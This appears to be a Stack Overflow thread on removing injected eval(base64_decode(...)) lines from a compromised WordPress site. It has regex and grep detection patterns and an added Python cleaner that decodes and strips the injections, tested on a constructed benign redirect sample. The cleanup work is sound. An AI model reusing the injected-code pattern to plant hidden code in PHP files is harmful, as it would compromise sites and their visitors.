
So basically a WordPress site that wasn't updated was compromised. I've downloaded the files, identified the infected ones, and I found a pattern.

At the top of the file there is code like the following

eval(base64_decode("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"));

Or something close with different characters.

I'm using grepWin to remove the code from a few hundred PHP files. What regex can I use that will remove code that begins with eval(base64_decode( followed by a long line of text and ends with "));? Note that the text in between is different for some files.

[note - the code I used above was shortened; I don't want to trigger any virus protectors with suspicious code]

kenorb
Julian
  • Most likely, the string is the same in every file (I've been affected by this before and this was the case, since it just decodes to a simple redirect). Just do a search and replace for the whole string. – jeremyharris Jan 15 '13 at 21:04
  • When I fixed one of these, I found a standard search and replace was fine - all strings were identical. Btw, a few points: (a) it's perfectly safe to put the real code here, and the exact string is of public interest since people may be searching by it, (b) posting it here should not trigger any virus detectors, and (c) if you want to see the malicious code without accidentally running it, decode it [here](http://www.tareeinternet.com/scripts/decrypt.php). – halfer Jan 15 '13 at 21:05
  • Of interest: http://stackoverflow.com/questions/5922762/eval-base64-decode-php-virus – halfer Jan 15 '13 at 21:08
  • Why try to "fix" all the files? Why not force WordPress to reinstall the latest update, then replace all the plugins and the theme with new installs too? If nothing else, that will reduce what needs to be "cleaned". – webaware Jan 15 '13 at 21:43
  • @jeremyharris I decided to do that, there were only two versions of the malicious code so no regex was needed after all – Julian Jan 16 '13 at 00:00
  • @Julian cool. Run a scan for `eval(` afterwards to make sure you caught everything. And lock down your wordpress install :) – jeremyharris Jan 16 '13 at 00:32

2 Answers


A regex for matching that would be as follows:

/eval\(base64_decode\("[^\)]+\)\)\;/

With WinGrep, use this string, though. Windows grep doesn't like the surrounding slashes.

eval\(base64_decode\("[^\)]+\)\)\;

Then just replace with an empty string. Grep doesn't usually provide this replace functionality, but I noted you said you were using WinGrep, which does provide a global replace function.

AlienHoboken
  • WindowsGrep 2.3 from [www.wingrep.com] doesn't handle this RE for the given input correctly - a match seems to be limited to about 1024 characters. – Armali Jan 10 '14 at 10:18

The following grep command may help to find such files:

grep -R 'return.*base64_decode' .

or:

grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' .

However, you should use special scanners for it; see: PHP security scanner.

kenorb
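Added example, not code from either answer above: a small Python cleaner that does what the two answers describe in one pass, finding every eval(base64_decode("...")); injection under a directory, decoding the payload for inspection without ever executing it, stripping it with a backup, and then running the follow-up scan for any leftover eval( that the comments recommend. The payload group is restricted to the base64 alphabet rather than [^)]+, so a match cannot run on past the closing quote, and Python's re has no match-length cap of the kind reported for WindowsGrep. The sample file, the redirect.invalid payload, and the temporary wp-content/index.php path are constructed for the demo and are assumptions, not data from the question.

```python
import base64
import re
import tempfile
from pathlib import Path

# Pattern for the injected line: eval(base64_decode("...")); with either
# quote style and optional whitespace. The payload is limited to the base64
# alphabet, so the match stops at the closing quote instead of running on to
# the next ')' the way [^)]+ can when the payload is mangled.
INJECTED_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*(?P<q>["\'])'
    r'(?P<payload>[A-Za-z0-9+/=\s]*)'
    r'(?P=q)\s*\)\s*\)\s*;?[ \t]*\r?\n?'
)

# Follow-up check from the comments: any eval( that survives cleaning
# deserves a manual look.
LEFTOVER_EVAL_RE = re.compile(r'\beval\s*\(')


def decode_payload(payload: str) -> str:
    """Decode the base64 argument for inspection only; it is never executed."""
    compact = re.sub(r'\s+', '', payload)
    compact += '=' * (-len(compact) % 4)        # tolerate stripped padding
    return base64.b64decode(compact).decode('utf-8', errors='replace')


def find_injections(text: str):
    """Return [(offset, decoded_payload), ...] for every injected eval in text."""
    return [(m.start(), decode_payload(m.group('payload')))
            for m in INJECTED_RE.finditer(text)]


def strip_injections(text: str):
    """Return (cleaned_text, removed_count)."""
    return INJECTED_RE.subn('', text)


def leftover_evals(text: str):
    """Offsets of any eval( still present after cleaning."""
    return [m.start() for m in LEFTOVER_EVAL_RE.finditer(text)]


def clean_tree(root, dry_run=True):
    """Scan *.php under root; with dry_run=False, back up and rewrite hits.

    Returns {path: [(offset, decoded_payload), ...]} for files that matched.
    """
    report = {}
    for path in Path(root).rglob('*.php'):
        # surrogateescape preserves any non-UTF-8 bytes through the rewrite
        text = path.read_text(encoding='utf-8', errors='surrogateescape')
        hits = find_injections(text)
        if not hits:
            continue
        report[str(path)] = hits
        if not dry_run:
            path.with_name(path.name + '.bak').write_text(
                text, encoding='utf-8', errors='surrogateescape')
            cleaned, _ = strip_injections(text)
            path.write_text(cleaned, encoding='utf-8', errors='surrogateescape')
    return report


# Constructed sample (assumption, not a real payload): a redirect of the kind
# the comments describe, wrapped the way the question shows, followed by a
# legitimate base64_decode call that must survive the cleanup.
SAMPLE_DECODED = 'header("Location: http://redirect.invalid/"); exit;'
SAMPLE_PAYLOAD = base64.b64encode(SAMPLE_DECODED.encode()).decode()
SAMPLE_PHP = (
    '<?php eval(base64_decode("' + SAMPLE_PAYLOAD + '")); ?>\n'
    '<?php\n'
    '// legitimate use of base64_decode, not an injection\n'
    'echo base64_decode("aGVsbG8=");\n'
)


def demo():
    """Write the sample into a temp dir (assumed layout), dry-run, then clean."""
    with tempfile.TemporaryDirectory() as tmp:
        target = Path(tmp) / 'wp-content' / 'index.php'
        target.parent.mkdir(parents=True)
        target.write_text(SAMPLE_PHP, encoding='utf-8')
        before = clean_tree(tmp, dry_run=True)
        clean_tree(tmp, dry_run=False)
        after = target.read_text(encoding='utf-8')
        return before, after


if __name__ == '__main__':
    found, cleaned = demo()
    for path, hits in found.items():
        for offset, decoded in hits:
            print(f'{path}@{offset}: {decoded}')
    print('leftover eval( offsets:', leftover_evals(cleaned))
```

Run it with dry_run=True first and read the decoded payloads; if they are all the same redirect, the plain search-and-replace the commenters used is enough, and the regex path is only needed when the strings differ per file. Keep the .bak copies until the site has been reinstalled from clean WordPress, theme and plugin packages, as webaware suggests, since stripping the eval line does not remove whatever dropped it.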